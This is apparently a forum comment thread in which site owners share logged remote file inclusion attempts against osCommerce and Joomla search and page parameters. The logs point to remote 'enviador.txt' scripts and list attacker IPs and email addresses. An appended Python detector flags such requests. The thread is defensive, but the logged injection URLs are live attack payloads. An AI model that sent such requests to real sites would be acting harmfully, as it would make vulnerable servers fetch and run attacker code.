Another hacker trying to inject a PHP script located at http://www.1004smile.com/data/enviador.txt
[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=&para=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com
This has something to do with the OSCOMMERCE search routine.
also
http://www.neobundao.com/enviador.txt?&servidor=
and
http://www.darkhand.net/Bots/enviador.txt?&
Another one http://www.opengear.at/rotator/enviador.txt
hacker also using email kbtcone@yahoo.com and enviador.txt file to attack oscommerce sites
who the hell they are ... trying same on 4 of my websites... URL:[/index.php?p=http://premmy.myftp.biz:8080/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com][/index.php?p=http://www.fpe.sn/webcam/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com] From IP:{173.201.253.28, 194.24.252.101, 200.58.112.125, 200.80.36.148, 202.67.226.122, 208.109.186.113, 208.109.98.121, 218.189.139.238, 41.208.148.72, 62.156.178.189, 69.175.85.82, 72.167.48.2} I think we must block these IPs
Not just OSCommerce websites are affected. Joomla sites are also vulnerable to this attack, usually with the e-mail address premmy35@gmail.com
I detect this kind of attack on my websites on an almost daily basis. What can be done for this to be stopped permanently?
[BVS]
@Abhishek Sachan - blocking the IP addresses was also something that came into my mind but I'm afraid it won't do any good as the attacker(s) use another IP every time. I have detected attempts originating from Taiwanese, Russian, Polish, Iranian and German addresses.
[BVS]
Yeah, you are right.. blocking IP is something difficult for them, but I have something new in my mind, not implemented yet... we can detect their user_agents; they are generally of type bots.. there are databases present online which can tell you about the user agents. We can block them by scripts, but this method can also fail because it's easy to change user agent...
If you install M&M Autoban you can ban the action they are taking; it will then take care of banning the IPs it detects doing this.
Add the URLs and email addresses to the hackers file. In most cases they are already in it. Look for a new version soon as the next upgrade will let you ban countries you do not want on your site.
I also detect in my web server logs a similar attack but using "sexycabrito@gmail.com" instead of "premy35@gmail.com". Can someone please give me more explanation about the mechanism of this attack?
best regards
hello
I have the same logs appearing in my web server but using "sexycabrito@gmail.com" instead of "premy35@gmail.com". Can anybody give me more explanation about these attacks?
thanks
best regards
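
Several comments above note that the source IP and user agent change between attempts while the request keeps one shape: a page or id parameter (`p`, `categories_id`) whose value is a remote URL. The following is an added example, not code from the post or any commenter, that flags that shape in request URIs; the sample entries, host names and the `url_params` allowlist are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# A parameter value that starts with a URL scheme, e.g. ?p=http://host/file.txt?
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def remote_include_params(request_uri, url_params=()):
    """Return [(name, value)] for query parameters whose value is a remote URL.

    url_params lists parameter names that legitimately carry URLs on the site
    (an assumption of this example, e.g. a login redirect target).
    """
    _path, _sep, query = request_uri.partition("?")
    hits = []
    # parse_qsl percent-decodes, so http%3A%2F%2F is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in url_params and REMOTE_URL.match(value):
            hits.append((name, value))
    return hits


def scan(entries, url_params=()):
    """entries: iterable of (client_ip, request_uri). Returns {ip: [hits]}."""
    report = {}
    for ip, uri in entries:
        hits = remote_include_params(uri, url_params)
        if hits:
            report.setdefault(ip, []).extend(hits)
    return report


# Constructed sample entries (documentation IP ranges and example hosts).
SAMPLE = [
    ("192.0.2.10", "/index.php?p=http://files.example.net/enviador.txt?"
                   "&servidor=www.shop.example/index.php?p=&para=someone@example.org"),
    ("198.51.100.7", "/advanced_search_result.php"
                     "?categories_id=HTTP%3A%2F%2Ffiles.example.net%2Fenviador.txt%3F"),
    ("203.0.113.5", "/index.php?p=contact&ref=http+status+codes"),
    ("203.0.113.5", "/login.php?return=https://www.shop.example/account.php"),
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE, url_params=("return",)).items():
        print(ip, hits)
```

Because the check keys on the parameter value rather than the sender, it matches the same probe from any address; the allowlist keeps genuine URL-carrying parameters from being reported.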